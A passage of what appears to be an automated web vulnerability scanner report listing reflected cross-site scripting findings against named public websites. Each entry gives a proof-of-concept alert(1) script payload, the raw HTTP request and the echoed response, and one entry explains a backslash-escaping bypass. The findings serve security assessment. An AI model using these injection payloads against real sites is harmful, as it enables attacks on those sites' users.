<title>404 Not Found</title>

<map name="mainbar">
<area shape=rect coords="0,0,104,19" href="http://www.umd.edu/whoswho.html" alt="Directories">
<area shape=rect coords="105,0,184,19" href="http://www.search.umd.edu/" alt="Sear
...[SNIP]...
<CENTER>The Web page you are trying to access, http://www.umd.edu/server-statusfeb3b<script>alert(1)</script>00e7ed0c476, at the <A HREF="http://www.umd.edu/">
...[SNIP]...

3.91. http://www.umd.edu/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.umd.edu
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c252a<script>alert(1)</script>806ac900486 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?c252a<script>alert(1)</script>806ac900486=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.umd.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response


<html>
<head>
<title>403 Forbidden</title>

<map name="mainbar">
<area shape=rect coords="0,0,104,19" href="http://www.umd.edu/whoswho.html" alt="Directories">
<area shape=rect coords="105,0,184,19" href="http://www.search.umd.edu/" alt="Sear
...[SNIP]...
<CENTER>You do not have permission to access, http://www.umd.edu/server-status?c252a<script>alert(1)</script>806ac900486=1, on <A HREF="http://www.umd.edu/">
...[SNIP]...

3.92. http://www.utk.edu/server-info [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.utk.edu
Path:   /server-info

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7e554<script>alert(1)</script>ed93f49b8d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-info7e554<script>alert(1)</script>ed93f49b8d2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.utk.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:52:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Content-Length: 6537
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
...[SNIP]...
<span style="color: #d06000;">www.utk.edu/server-info7e554<script>alert(1)</script>ed93f49b8d2</span>
...[SNIP]...

3.93. http://www.utk.edu/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.utk.edu
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d9d7e<script>alert(1)</script>0a9974e9f8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusd9d7e<script>alert(1)</script>0a9974e9f8f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.utk.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Content-Length: 6539
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
...[SNIP]...
<span style="color: #d06000;">www.utk.edu/server-statusd9d7e<script>alert(1)</script>0a9974e9f8f</span>
...[SNIP]...

3.94. http://www.weei.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weei.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf822'-alert(1)-'75e4f05332b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusbf822'-alert(1)-'75e4f05332b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.weei.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=900
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1301710361"
Last-Modified: Sat, 02 Apr 2011 02:12:41 GMT
X-AH-Environment: prod
Content-Length: 80002
Date: Sat, 02 Apr 2011 02:12:41 GMT
X-Varnish: 1739977646
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<!--
//configuration
OAS_url = 'http://oascentral.weei.com/';
OAS_sitepage = 'www.weei.com/server-statusbf822'-alert(1)-'75e4f05332b';
//OAS_sitepage = window.location.hostname + window.location.pathname;
OAS_listpos = 'x10,x20,x11';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '00123456789
...[SNIP]...

3.95. http://www.4shared.com/server-status [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /server-status

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload bcd7d--><script>alert(1)</script>f4d5f7b261f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=bcd7d--><script>alert(1)</script>f4d5f7b261f

Response

HTTP/1.1 404 /server-status
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 02:39:58 GMT
Content-Length: 41831


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.google.com/search?hl=en&q=bcd7d--><script>alert(1)</script>f4d5f7b261f-->
...[SNIP]...

3.96. http://www.abcteach.com/server-info [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.abcteach.com
Path:   /server-info

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 28a70><script>alert(1)</script>24ad985c955 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-info HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.abcteach.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=28a70><script>alert(1)</script>24ad985c955

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:58:09 GMT
Server: Apache/2.2.6 (FreeBSD) mod_ssl/2.2.6 OpenSSL/0.9.7e-p1 DAV/2 PHP/4.4.7 with Suhosin-Patch
X-Powered-By: PHP/4.4.7
Vary: Accept-Encoding
Content-Length: 599
Content-Type: text/html

<html>
<head>
<title>Missing Page</title>
</head>

<body>
<H1>Missing Page</H1>

You have requested a page that has moved or is missing.
<br><br>
<form method="post" action="/globals/record_bad_url.ph
...[SNIP]...
<input type=hidden value=http://www.google.com/search?hl=en&q=28a70><script>alert(1)</script>24ad985c955 name=referrer>
...[SNIP]...

3.97. http://www.bnet.com/server-status [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bnet.com
Path:   /server-status

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a0a0"><a>3df0fa5767a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bnet.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: 2a0a0"><a>3df0fa5767a

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:53:03 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Sun, 01-Apr-2012 02:53:03 GMT; path=/; domain=.bnet.com
Content-Type: text/html; charset=utf-8
Content-Length: 68180


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
g/i/r=10165&amp;sg=1815&amp;o=13054%253A13113%253A&amp;h=cn&amp;p=&amp;b=14&amp;l=&amp;site=23&amp;pt=2404&amp;nd=13113&amp;pid=&amp;cid=0&amp;pp=100&amp;e=&amp;rqid=00c13-ad-e7:4D9672C71EA5BA&amp;orh=2a0a0"><a>3df0fa5767a&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=2a0a0">
...[SNIP]...

3.98. http://www.careerbuilder.com/server-status [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /server-status

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb5e1\'%3balert(1)//4a0a57fbaa0 was submitted in the Referer HTTP header. This input was echoed as eb5e1\\';alert(1)//4a0a57fbaa0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.careerbuilder.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=eb5e1\'%3balert(1)//4a0a57fbaa0

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 44777
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=c86444fa76a84e4480ba515c0be3b7a5-355012557-VS-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X15802248F1D5BE2BBFFFBA413A1DFA64B997A0190E0E6429D00421C8E48B9F63670BE5D8558851B9AC9D41BB032E403FE; domain=.careerbuilder.com; expires=Mon, 02-Apr-2012 02:35:56 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: REBEL40
Date: Sat, 02 Apr 2011 02:35:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   404 Fi
...[SNIP]...
s_cb.server='www';
s_cb.eVar8='www.careerbuilder.com/404.aspx';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - eb5e1\\';alert(1)//4a0a57fbaa0';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

3.99. http://www.evite.com/server-status [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.evite.com
Path:   /server-status

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload f207d--><script>alert(1)</script>9d974f1e3a4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.evite.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=f207d--><script>alert(1)</script>9d974f1e3a4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: User-Agent
Expires: Sat, 02 Apr 2011 02:35:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 02:35:41 GMT
Content-Length: 15582
Connection: close
Set-Cookie: eviteAuth=; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: eviteAuth=; Domain=.evite.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: trackLoggedIn=; Domain=www.evite.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sequence=2; Path=/


                                                       <!-- jsp path = /jsp/pages/includes/incHeader.jsp -->

   
                                                                                                                                                                               
...[SNIP]...
<!--http://www.evite.com/server-status from http://www.google.com/search?hl=en&q=f207d--><script>alert(1)</script>9d974f1e3a4-->
...[SNIP]...

3.100. http://www.fool.com/server-status [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fool.com
Path:   /server-status

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload a5d48<script>alert(1)</script>f298079278e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fool.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=a5d48<script>alert(1)</script>f298079278e

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=&fy=false&ybls=0; domain=.fool.com; path=/
Set-Cookie: Fool=Uid=1552547950&Username=&V=5&DesktopPreference=false&R=false; domain=.fool.com; expires=Thu, 01-Apr-2021 04:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: Tookie=T=38161382128527323652563704736534; domain=.fool.com; expires=Mon, 29-Mar-2021 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 02:58:53 GMT
Content-Length: 25499


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head><title>
   Fool.com: Stock Investing Adv
...[SNIP]...
<em>a5d48<script>alert(1)</script>f298079278e</em>
...[SNIP]...

3.101. http://www.gamespot.com/server-status [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gamespot.com
Path:   /server-status

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0117"><script>alert(1)</script>07e27c0fcf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamespot.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=b0117"><script>alert(1)</script>07e27c0fcf

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:45:56 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Mon, 02-May-2011 02:45:56 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_040111=2; expires=Tue, 05-Apr-2011 02:45:56 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34629


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
3210&onid=39&PD=0&xref=http%3A%2F%2Fwww.google.com%2Fsearch&_unsafe_xref=http://www.google.com/search&xrq=hl%3Den%26q%3Db0117%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E07e27c0fcf&_unsafe_xrq=hl=en&q=b0117"><script>alert(1)</script>07e27c0fcf&edid=107&ts=1301712356&oid=3210-39_6-0-0&ld=www.gamespot.com&clgf=&globid=&url=http%3A%2F%2Fwww.gamespot.com%2Fpages%2Fmisc%2Ferror%2F404.html&_unsafe_url=http://www.gamespot.com/pages/misc/error/404.
...[SNIP]...

3.102. http://www.hawaii.edu/server-status [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hawaii.edu
Path:   /server-status

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71870"><script>alert(1)</script>affe0ff9b1e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the data copied into the response arrives in a request header, the behaviour is not trivial to exploit against another user: an ordinary web page cannot set the Referer header of a victim's request to an arbitrary value. Client-side technologies such as Flash have in the past allowed a page to make a victim's browser send a request with attacker-chosen headers; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hawaii.edu
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=71870"><script>alert(1)</script>affe0ff9b1e

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:42:21 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d Resin/3.1.8 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 6404
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="c
...[SNIP]...
<input type="text" name="prev" value="http://www.google.com/search?hl=en&q=71870"><script>alert(1)</script>affe0ff9b1e" size="60">
...[SNIP]...

3.103. http://www.phonenumber.com/server-info [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.phonenumber.com
Path:   /server-info

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89499</script><script>alert(1)</script>7862d696a08 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the data copied into the response arrives in a request header, the behaviour is not trivial to exploit against another user: an ordinary web page cannot set the Referer header of a victim's request to an arbitrary value. Client-side technologies such as Flash have in the past allowed a page to make a victim's browser send a request with attacker-chosen headers; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-info HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.phonenumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=89499</script><script>alert(1)</script>7862d696a08

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:58:31 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.30
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 23618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=us-a
...[SNIP]...
<!--
               omni_refer('http://www.google.com/search?hl=en&q=89499</script><script>alert(1)</script>7862d696a08');
               omni_settings(
                   'Error - 404',
                   'PhoneNumber.com (2321)',
                   'Error',
                   'errorPage',
                   'Error',
                   'Invalid',
                   'event4'
               );
               
               omni_execute();
           // -->
...[SNIP]...

3.104. http://www.pogo.com/server-status [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /server-status

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c13ec</script><script>alert(1)</script>d3eff21a584 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the data copied into the response arrives in a request header, the behaviour is not trivial to exploit against another user: an ordinary web page cannot set the Referer header of a victim's request to an arbitrary value. Client-side technologies such as Flash have in the past allowed a page to make a victim's browser send a request with attacker-chosen headers; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pogo.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=c13ec</script><script>alert(1)</script>d3eff21a584

Response

HTTP/1.1 403
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html
Date: Sat, 02 Apr 2011 02:41:02 GMT
Server: Apache-Coyote/1.1
Content-Length: 3782


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Authorization Failure
   </title>
   
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=c13ec</script><script>alert(1)</script>d3eff21a584";
s.eVar2="pogo";
s.pageName="ERROR: Authorization Failure Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Authorization Failure Page:Non Authenticated";
s.prop8="Non Authent
...[SNIP]...

3.105. http://www.shutterfly.com/server-status [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.shutterfly.com
Path:   /server-status

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be03f"><a>1441557110c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the data copied into the response arrives in a request header, the behaviour is not trivial to exploit against another user: an ordinary web page cannot set the Referer header of a victim's request to an arbitrary value. Client-side technologies such as Flash have in the past allowed a page to make a victim's browser send a request with attacker-chosen headers; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shutterfly.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=be03f"><a>1441557110c

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:43:06 GMT
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa TAIa PSAa PSDa OUR BUS ONL COM NAV INT STA PRE UNI"
Pragma: no-cache
Cache-Control: no-store
Expires: Tue, 01 Jan 1980 1:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 18331


<script>
pageloadTimeStart = new Date();
</script>

<script>
var userDataCookieName = "sflyData2";
var defaultCookieDomain = ".shutterfly.com";
</script>


<!DOCTYPE HTML PUBLIC "-
...[SNIP]...
n/sfly_uat_guid_edat/v3/location._error404_start.sfly/visitorid.e859515e-5cd2-11e0-8c21-355250911168/userid./partnerid.SFLY/partnersubid.WEB/campaignid./refid./url.http:__www.google.com_search_hl=en&q=be03f"><a>1441557110c">
...[SNIP]...

3.106. http://www.surveygizmo.com/server-status [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.surveygizmo.com
Path:   /server-status

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 47ac1--><script>alert(1)</script>189060c7204 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

